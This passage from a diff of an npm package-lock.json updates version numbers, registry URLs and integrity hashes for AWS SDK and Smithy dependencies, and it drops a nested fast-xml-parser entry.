"sha512-c0ZF+lwoWVvX5iCaGKL5T/4DnIw88CGqxA0BcBs3U86mIp5EZYPVg+KSPkMXOyokmADvNewiMUfSG2uFwjRp0g==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/property-provider": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/util-stream": "^4.5.21", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/property-provider": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/util-stream": "^4.5.25", "tslib": "^2.6.2" }, "engines": { @@ -1138,24 +1230,24 @@ } }, "node_modules/@aws-sdk/credential-provider-ini": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.972.27.tgz", - "integrity": "sha512-Um26EsNSUfVUX0wUXnUA1W3wzKhVy6nviEElsh5lLZUYj9bk6DXOPnpte0gt+WHubcVfVsRk40bbm4KaroTEag==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-ini/-/credential-provider-ini-3.972.35.tgz", + "integrity": "sha512-jsU4u/cRkKFLKQS0k918FQ27fzXLG5ENiLWQMYE6581zLeI2hWh04ptlrvZMB3wJT/5d+vSzJk74X1CMFr4y8Q==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/credential-provider-env": "^3.972.24", - "@aws-sdk/credential-provider-http": "^3.972.26", - "@aws-sdk/credential-provider-login": "^3.972.27", - "@aws-sdk/credential-provider-process": "^3.972.24", - "@aws-sdk/credential-provider-sso": "^3.972.27", - "@aws-sdk/credential-provider-web-identity": "^3.972.27", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/credential-provider-imds": "^4.2.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/credential-provider-env": "^3.972.31", + "@aws-sdk/credential-provider-http": "^3.972.33", + "@aws-sdk/credential-provider-login": "^3.972.35", + "@aws-sdk/credential-provider-process": "^3.972.31", + "@aws-sdk/credential-provider-sso": "^3.972.35", + "@aws-sdk/credential-provider-web-identity": "^3.972.35", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/credential-provider-imds": "^4.2.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1163,18 +1255,18 @@ } }, "node_modules/@aws-sdk/credential-provider-login": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-login/-/credential-provider-login-3.972.27.tgz", - "integrity": "sha512-t3ehEtHomGZwg5Gixw4fYbYtG9JBnjfAjSDabxhPEu/KLLUp0BB37/APX7MSKXQhX6ZH7pseuACFJ19NrAkNdg==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-login/-/credential-provider-login-3.972.35.tgz", + "integrity": "sha512-5oa3j0cA50jPqgNhZ9XdJVopuzUf1klRb28/2MfLYWWiPi9DRVvbrBWT+DidbHTT36520VuXZJahQwR+YgSjrg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1182,22 +1274,22 @@ } }, "node_modules/@aws-sdk/credential-provider-node": { - "version": "3.972.28", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.972.28.tgz", - "integrity": "sha512-rren+P6k5rShG5PX61iVi40kKdueyuMLBRTctQbyR5LooO9Ygr5L6R7ilG7RF1957NSH3KC3TU206fZuKwjSpQ==", + "version": "3.972.36", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-node/-/credential-provider-node-3.972.36.tgz", + "integrity": "sha512-4nT2T8Z7vH8KE9EdjEsuIlHpZSlcaK2PrKbQBjuUGU46BCCzF3WvP0u0Uiosni3Ykmmn4rWLVawoOCLotUtCbg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/credential-provider-env": "^3.972.24", - "@aws-sdk/credential-provider-http": "^3.972.26", - "@aws-sdk/credential-provider-ini": "^3.972.27", - "@aws-sdk/credential-provider-process": "^3.972.24", - "@aws-sdk/credential-provider-sso": "^3.972.27", - "@aws-sdk/credential-provider-web-identity": "^3.972.27", - "@aws-sdk/types": "^3.973.6", - "@smithy/credential-provider-imds": "^4.2.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/credential-provider-env": "^3.972.31", + "@aws-sdk/credential-provider-http": "^3.972.33", + "@aws-sdk/credential-provider-ini": "^3.972.35", + "@aws-sdk/credential-provider-process": "^3.972.31", + "@aws-sdk/credential-provider-sso": "^3.972.35", + "@aws-sdk/credential-provider-web-identity": "^3.972.35", + "@aws-sdk/types": "^3.973.8", + "@smithy/credential-provider-imds": "^4.2.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1205,16 +1297,16 @@ } }, "node_modules/@aws-sdk/credential-provider-process": { - "version": "3.972.24", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.972.24.tgz", - "integrity": "sha512-Q2k/XLrFXhEztPHqj4SLCNID3hEPdlhh1CDLBpNnM+1L8fq7P+yON9/9M1IGN/dA5W45v44ylERfXtDAlmMNmw==", + "version": "3.972.31", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-process/-/credential-provider-process-3.972.31.tgz", + "integrity": "sha512-eKeT4MXumpBJsrDLCYcSzIkFPVTFn/es7It2oogp2OhU/ic7P/+xzFpQx9ZhwtXS57Mc5S42BPWi7lHmvs/nYg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1222,18 +1314,18 @@ } }, "node_modules/@aws-sdk/credential-provider-sso": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.972.27.tgz", - "integrity": "sha512-CWXeGjlbBuHcm9appZUgXKP2zHDyTti0/+gXpSFJ2J3CnSwf1KWjicjN0qG2ozkMH6blrrzMrimeIOEYNl238Q==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-sso/-/credential-provider-sso-3.972.35.tgz", + "integrity": "sha512-bCuBdfnj0KGDMdLp6utMTLiJcFN2ek9EgZinxQZZSc3FxjJ/HSqeqab2cjbnoNfy8RM6suDCsRkmVY1izp9I+A==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/token-providers": "3.1020.0", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/token-providers": "3.1036.0", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1241,17 +1333,17 @@ } }, "node_modules/@aws-sdk/credential-provider-web-identity": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.972.27.tgz", - "integrity": "sha512-CUY4hQIFswdQNEsRGEzGBUKGMK5KpqmNDdu2ROMgI+45PLFS8H0y3Tm7kvM16uvvw3n1pVxk85tnRVUTgtaa1w==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-web-identity/-/credential-provider-web-identity-3.972.35.tgz", + "integrity": "sha512-swW6Bwvl8lanyEMtZOWE/oR6yqcRQH4HTQZUVsnDVgoXvRjRywpYpLv2BWwjUFyjPrqsdX6FeTkf4tMSe/qFTQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1335,14 +1427,14 @@ } }, "node_modules/@aws-sdk/middleware-host-header": { - "version": "3.972.8", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-host-header/-/middleware-host-header-3.972.8.tgz", - "integrity": "sha512-wAr2REfKsqoKQ+OkNqvOShnBoh+nkPurDKW7uAeVSu6kUECnWlSJiPvnoqxGlfousEY/v9LfS9sNc46hjSYDIQ==", + "version": "3.972.10", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-host-header/-/middleware-host-header-3.972.10.tgz", + "integrity": "sha512-IJSsIMeVQ8MMCPbuh1AbltkFhLBLXn7aejzfX5YKT/VLDHn++Dcz8886tXckE+wQssyPUhaXrJhdakO2VilRhg==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1364,13 +1456,13 @@ } }, "node_modules/@aws-sdk/middleware-logger": { - "version": "3.972.8", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-logger/-/middleware-logger-3.972.8.tgz", - "integrity": "sha512-CWl5UCM57WUFaFi5kB7IBY1UmOeLvNZAZ2/OZ5l20ldiJ3TiIz1pC65gYj8X0BCPWkeR1E32mpsCk1L1I4n+lA==", + "version": "3.972.10", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-logger/-/middleware-logger-3.972.10.tgz", + "integrity": "sha512-OOuGvvz1Dm20SjZo5oEBePFqxt5nf8AwkNDSyUHvD9/bfNASmstcYxFAHUowy4n6Io7mWUZ04JURZwSBvyQanQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1378,15 +1470,15 @@ } }, "node_modules/@aws-sdk/middleware-recursion-detection": { - "version": "3.972.9", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-recursion-detection/-/middleware-recursion-detection-3.972.9.tgz", - "integrity": "sha512-/Wt5+CT8dpTFQxEJ9iGy/UGrXr7p2wlIOEHvIr/YcHYByzoLjrqkYqXdJjd9UIgWjv7eqV2HnFJen93UTuwfTQ==", + "version": "3.972.11", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-recursion-detection/-/middleware-recursion-detection-3.972.11.tgz", + "integrity": "sha512-+zz6f79Kj9V5qFK2P+D8Ehjnw4AhphAlCAsPjUqEcInA9umtSSKMrHbSagEeOIsDNuvVrH98bjRHcyQukTrhaQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", + "@aws-sdk/types": "^3.973.8", "@aws/lambda-invoke-store": "^0.2.2", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1408,23 +1500,23 @@ } }, "node_modules/@aws-sdk/middleware-sdk-s3": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-sdk-s3/-/middleware-sdk-s3-3.972.27.tgz", - "integrity": "sha512-gomO6DZwx+1D/9mbCpcqO5tPBqYBK7DtdgjTIjZ4yvfh/S7ETwAPS0XbJgP2JD8Ycr5CwVrEkV1sFtu3ShXeOw==", + "version": "3.972.34", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-sdk-s3/-/middleware-sdk-s3-3.972.34.tgz", + "integrity": "sha512-/UL96JKjsjdodcRRMKl99tLQvK6Oi9ptLC9iU1yiTF/ruaDX0mtBBtnLNZDxIZRJOCVOtB49ed1YaTadqygk8Q==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", "@aws-sdk/util-arn-parser": "^3.972.3", - "@smithy/core": "^3.23.13", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/signature-v4": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@smithy/core": "^3.23.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/signature-v4": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-stream": "^4.5.21", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-stream": "^4.5.25", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" }, @@ -1447,18 +1539,18 @@ } }, "node_modules/@aws-sdk/middleware-user-agent": { - "version": "3.972.27", - "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-user-agent/-/middleware-user-agent-3.972.27.tgz", - "integrity": "sha512-TIRLO5UR2+FVUGmhYoAwVkKhcVzywEDX/5LzR9tjy1h8FQAXOtFg2IqgmwvxU7y933rkTn9rl6AdgcAUgQ1/Kg==", + "version": "3.972.35", + "resolved": "https://registry.npmjs.org/@aws-sdk/middleware-user-agent/-/middleware-user-agent-3.972.35.tgz", + "integrity": "sha512-hOFWNOjVmOocpRlrU04nYxjMOeoe0Obu5AXEuhB8zblMCPl3cG1hdluQCZERRKFyhMQjwZnDbhSHjoMUjetFGw==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/util-endpoints": "^3.996.5", - "@smithy/core": "^3.23.13", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", - "@smithy/util-retry": "^4.2.12", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@smithy/core": "^3.23.17", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", + "@smithy/util-retry": "^4.3.4", "tslib": "^2.6.2" }, "engines": { @@ -1466,47 +1558,48 @@ } }, "node_modules/@aws-sdk/nested-clients": { - "version": "3.996.17", - "resolved": "https://registry.npmjs.org/@aws-sdk/nested-clients/-/nested-clients-3.996.17.tgz", - "integrity": "sha512-7B0HIX0tEFmOSJuWzdHZj1WhMXSryM+h66h96ZkqSncoY7J6wq61KOu4Kr57b/YnJP3J/EeQYVFulgR281h+7A==", + "version": "3.997.3", + "resolved": "https://registry.npmjs.org/@aws-sdk/nested-clients/-/nested-clients-3.997.3.tgz", + "integrity": "sha512-SivE6GP228IVgfsrr2c/vqTg95X0Qj39Yw4uIrcddpkUzIltNMoNOR62leHOLhODfjv9K8X2mPTwS69A5kT0nQ==", "license": "Apache-2.0", "dependencies": { "@aws-crypto/sha256-browser": "5.2.0", "@aws-crypto/sha256-js": "5.2.0", - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/middleware-host-header": "^3.972.8", - "@aws-sdk/middleware-logger": "^3.972.8", - "@aws-sdk/middleware-recursion-detection": "^3.972.9", - "@aws-sdk/middleware-user-agent": "^3.972.27", - "@aws-sdk/region-config-resolver": "^3.972.10", - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/util-endpoints": "^3.996.5", - "@aws-sdk/util-user-agent-browser": "^3.972.8", - "@aws-sdk/util-user-agent-node": "^3.973.13", - "@smithy/config-resolver": "^4.4.13", - "@smithy/core": "^3.23.13", - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/hash-node": "^4.2.12", - "@smithy/invalid-dependency": "^4.2.12", - "@smithy/middleware-content-length": "^4.2.12", - "@smithy/middleware-endpoint": "^4.4.28", - "@smithy/middleware-retry": "^4.4.45", - "@smithy/middleware-serde": "^4.2.16", - "@smithy/middleware-stack": "^4.2.12", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/protocol-http": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/region-config-resolver": "^3.972.13", + "@aws-sdk/signature-v4-multi-region": "^3.996.22", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.21", + "@smithy/config-resolver": "^4.4.17", + "@smithy/core": "^3.23.17", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-retry": "^4.5.5", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", "@smithy/util-body-length-node": "^4.2.3", - "@smithy/util-defaults-mode-browser": "^4.3.44", - "@smithy/util-defaults-mode-node": "^4.2.48", - "@smithy/util-endpoints": "^3.3.3", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-retry": "^4.2.12", + "@smithy/util-defaults-mode-browser": "^4.3.49", + "@smithy/util-defaults-mode-node": "^4.2.54", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" }, @@ -1515,15 +1608,15 @@ } }, "node_modules/@aws-sdk/region-config-resolver": { - "version": "3.972.10", - "resolved": "https://registry.npmjs.org/@aws-sdk/region-config-resolver/-/region-config-resolver-3.972.10.tgz", - "integrity": "sha512-1dq9ToC6e070QvnVhhbAs3bb5r6cQ10gTVc6cyRV5uvQe7P138TV2uG2i6+Yok4bAkVAcx5AqkTEBUvWEtBlsQ==", + "version": "3.972.13", + "resolved": "https://registry.npmjs.org/@aws-sdk/region-config-resolver/-/region-config-resolver-3.972.13.tgz", + "integrity": "sha512-CvJ2ZIjK/jVD/lbOpowBVElJyC1YxLTIJ13yM0AEo0t2v7swOzGjSA6lJGH+DwZXQhcjUjoYwc8bVYCX5MDr1A==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/config-resolver": "^4.4.13", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/config-resolver": "^4.4.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1531,16 +1624,16 @@ } }, "node_modules/@aws-sdk/signature-v4-multi-region": { - "version": "3.996.15", - "resolved": "https://registry.npmjs.org/@aws-sdk/signature-v4-multi-region/-/signature-v4-multi-region-3.996.15.tgz", - "integrity": "sha512-Ukw2RpqvaL96CjfH/FgfBmy/ZosHBqoHBCFsN61qGg99F33vpntIVii8aNeh65XuOja73arSduskoa4OJea9RQ==", + "version": "3.996.22", + "resolved": "https://registry.npmjs.org/@aws-sdk/signature-v4-multi-region/-/signature-v4-multi-region-3.996.22.tgz", + "integrity": "sha512-/rXhMXteD+BqhFd0nYprAgcZ/KtU+963uftPqd3tiFcFfooHZINXUGtOmo2SQjRVauCTNqIEzkwuSETdZFqTTA==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/middleware-sdk-s3": "^3.972.27", - "@aws-sdk/types": "^3.973.6", - "@smithy/protocol-http": "^5.3.12", - "@smithy/signature-v4": "^5.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/middleware-sdk-s3": "^3.972.34", + "@aws-sdk/types": "^3.973.8", + "@smithy/protocol-http": "^5.3.14", + "@smithy/signature-v4": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1548,17 +1641,17 @@ } }, "node_modules/@aws-sdk/token-providers": { - "version": "3.1020.0", - "resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.1020.0.tgz", - "integrity": "sha512-T61KA/VKl0zVUubdxigr1ut7SEpwE1/4CIKb14JDLyTAOne2yWKtQE1dDCSHl0UqrZNwW/bTt+EBHfQbslZJdw==", + "version": "3.1036.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/token-providers/-/token-providers-3.1036.0.tgz", + "integrity": "sha512-aNSJ6jjDYayxN9ZA1JpycVScX93Lx03kKZ1EXt3DGOTahcWVLJj3oLAlop0xKP+vP2Ga2t49p1tEaMkTbCCaZA==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/nested-clients": "^3.996.17", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/nested-clients": "^3.997.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1566,12 +1659,12 @@ } }, "node_modules/@aws-sdk/types": { - "version": "3.973.6", - "resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.973.6.tgz", - "integrity": "sha512-Atfcy4E++beKtwJHiDln2Nby8W/mam64opFPTiHEqgsthqeydFS1pY+OUlN1ouNOmf8ArPU/6cDS65anOP3KQw==", + "version": "3.973.8", + "resolved": "https://registry.npmjs.org/@aws-sdk/types/-/types-3.973.8.tgz", + "integrity": "sha512-gjlAdtHMbtR9X5iIhVUvbVcy55KnznpC6bkDUWW9z915bi0ckdUr5cjf16Kp6xq0bP5HBD2xzgbL9F9Quv5vUw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1591,15 +1684,15 @@ } }, "node_modules/@aws-sdk/util-endpoints": { - "version": "3.996.5", - "resolved": "https://registry.npmjs.org/@aws-sdk/util-endpoints/-/util-endpoints-3.996.5.tgz", - "integrity": "sha512-Uh93L5sXFNbyR5sEPMzUU8tJ++Ku97EY4udmC01nB8Zu+xfBPwpIwJ6F7snqQeq8h2pf+8SGN5/NoytfKgYPIw==", + "version": "3.996.8", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-endpoints/-/util-endpoints-3.996.8.tgz", + "integrity": "sha512-oOZHcRDihk5iEe5V25NVWg45b3qEA8OpHWVdU/XQh8Zj4heVPAJqWvMphQnU7LkufmUo10EpvFPZuQMiFLJK3g==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", - "@smithy/util-endpoints": "^3.3.3", + "@aws-sdk/types": "^3.973.8", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-endpoints": "^3.4.2", "tslib": "^2.6.2" }, "engines": { @@ -1618,27 +1711,27 @@ } }, "node_modules/@aws-sdk/util-user-agent-browser": { - "version": "3.972.8", - "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-browser/-/util-user-agent-browser-3.972.8.tgz", - "integrity": "sha512-B3KGXJviV2u6Cdw2SDY2aDhoJkVfY/Q/Trwk2CMSkikE1Oi6gRzxhvhIfiRpHfmIsAhV4EA54TVEX8K6CbHbkA==", + "version": "3.972.10", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-browser/-/util-user-agent-browser-3.972.10.tgz", + "integrity": "sha512-FAzqXvfEssGdSIz8ejatan0bOdx1qefBWKF/gWmVBXIP1HkS7v/wjjaqrAGGKvyihrXTXW00/2/1nTJtxpXz7g==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@smithy/types": "^4.14.1", "bowser": "^2.11.0", "tslib": "^2.6.2" } }, "node_modules/@aws-sdk/util-user-agent-node": { - "version": "3.973.13", - "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-node/-/util-user-agent-node-3.973.13.tgz", - "integrity": "sha512-s1dCJ0J9WU9UPkT3FFqhKTSquYTkqWXGRaapHFyWwwJH86ZussewhNST5R5TwXVL1VSHq4aJVl9fWK+svaRVCQ==", + "version": "3.973.21", + "resolved": "https://registry.npmjs.org/@aws-sdk/util-user-agent-node/-/util-user-agent-node-3.973.21.tgz", + "integrity": "sha512-Av4UHTcAWgdvbN0IP9pbtf4Qa1+6LtJqQdZWj5pLn5J67w0pnJJAZZ+7JPPcj2KN3378zD2JDM9DwJKEyvyMTQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/middleware-user-agent": "^3.972.27", - "@aws-sdk/types": "^3.973.6", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/types": "^3.973.8", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", "tslib": "^2.6.2" }, @@ -1655,39 +1748,19 @@ } }, "node_modules/@aws-sdk/xml-builder": { - "version": "3.972.16", - "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.16.tgz", - "integrity": "sha512-iu2pyvaqmeatIJLURLqx9D+4jKAdTH20ntzB6BFwjyN7V960r4jK32mx0Zf7YbtOYAbmbtQfDNuL60ONinyw7A==", + "version": "3.972.19", + "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.19.tgz", + "integrity": "sha512-Cw8IOMdBUEIl8ZlhRC3Dc/E64D5B5/8JhV6vhPLiPfJwcRC84S6F8aBOIi/N4vR9ZyA4I5Cc0Ateb/9EHaJXeQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", - "fast-xml-parser": "5.5.8", + "@smithy/types": "^4.14.1", + "fast-xml-parser": "5.7.1", "tslib": "^2.6.2" }, "engines": { "node": ">=20.0.0" } }, - "node_modules/@aws-sdk/xml-builder/node_modules/fast-xml-parser": { - "version": "5.5.8", - "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.8.tgz", - "integrity": "sha512-Z7Fh2nVQSb2d+poDViM063ix2ZGt9jmY1nWhPfHBOK2Hgnb/OW3P4Et3P/81SEej0J7QbWtJqxO05h8QYfK7LQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/NaturalIntelligence" - } - ], - "license": "MIT", - "dependencies": { - "fast-xml-builder": "^1.1.4", - "path-expression-matcher": "^1.2.0", - "strnum": "^2.2.0" - }, - "bin": { - "fxparser": "src/cli/cli.js" - } - }, "node_modules/@aws/lambda-invoke-store": { "version": "0.2.3", "resolved": 